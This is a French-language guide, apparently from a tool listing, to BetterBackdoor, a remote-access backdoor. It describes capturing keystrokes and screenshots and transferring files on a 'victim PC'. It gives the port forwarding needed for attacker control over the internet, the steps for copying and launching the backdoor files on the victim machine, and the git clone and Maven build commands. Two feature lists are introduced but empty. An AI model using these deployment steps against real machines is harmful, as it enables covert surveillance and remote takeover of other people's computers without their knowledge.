
Une porte dérobée avec une multitude de fonctionnalités.
Une porte dérobée (backdoor) est un outil utilisé pour obtenir un accès distant à une machine.
En général, les utilitaires de porte dérobée comme NetCat ont deux fonctions principales : rediriger l’entrée distante vers cmd ou bash et renvoyer la réponse. C’est utile, mais aussi limité. BetterBackdoor surmonte ces limitations en incluant la possibilité d’injecter des frappes, d’obtenir des captures d’écran, de transférer des fichiers, et bien d’autres tâches.
BetterBackdoor permet de créer et de contrôler une porte dérobée.
Cette porte dérobée créée peut :
Cette porte dérobée utilise une connexion socket client-serveur pour communiquer. L’attaquant démarre un serveur, et la victime se connecte à ce serveur en tant que client. (Remarque : si plusieurs clients tentent de se connecter, l’utilisateur est invité à choisir le client auquel se connecter.) Une fois la connexion établie, des commandes peuvent être envoyées au client pour contrôler la porte dérobée.
Pour créer la porte dérobée, BetterBackdoor :
La porte dérobée peut fonctionner sur un réseau local (LAN) et sur Internet (WAN). Cependant, pour l’utiliser sur WAN, il est nécessaire de rediriger les ports.
Pour une utilisation sur WAN, les ports 1025 et 1026 doivent être redirigés depuis l’ordinateur de l’attaquant avec le protocole TCP sélectionné. Une fois cela fait, la porte dérobée peut être contrôlée par l’attaquant même si la victime et l’attaquant se trouvent sur des réseaux différents.
Pour démarrer la porte dérobée sur un PC victime, transférez tous les fichiers du répertoire ‘backdoor’ sur le PC victime.
Si un JRE est fourni avec la porte dérobée, exécutez run.bat, sinon exécutez run.jar.
Cela démarrera la porte dérobée sur le PC de la victime.
Une fois en cours d’exécution, pour contrôler la porte dérobée, vous devez revenir à BetterBackdoor et lancer l’option 1 au démarrage.
BetterBackdoor est compatible avec Windows, Mac et Linux, tandis que la porte dérobée n’est compatible qu’avec Windows.
# cloner BetterBackdoor
git clone https://github.com/thatcherclough/BetterBackdoor.git
# se placer dans le répertoire BetterBackdoor
cd BetterBackdoor
# construire BetterBackdoor avec Maven
# pour Windows, exécuter
mvnw.cmd clean package
# pour Linux et Mac, exécuter
sh mvnw clean package
java -jar betterbackdoor.jar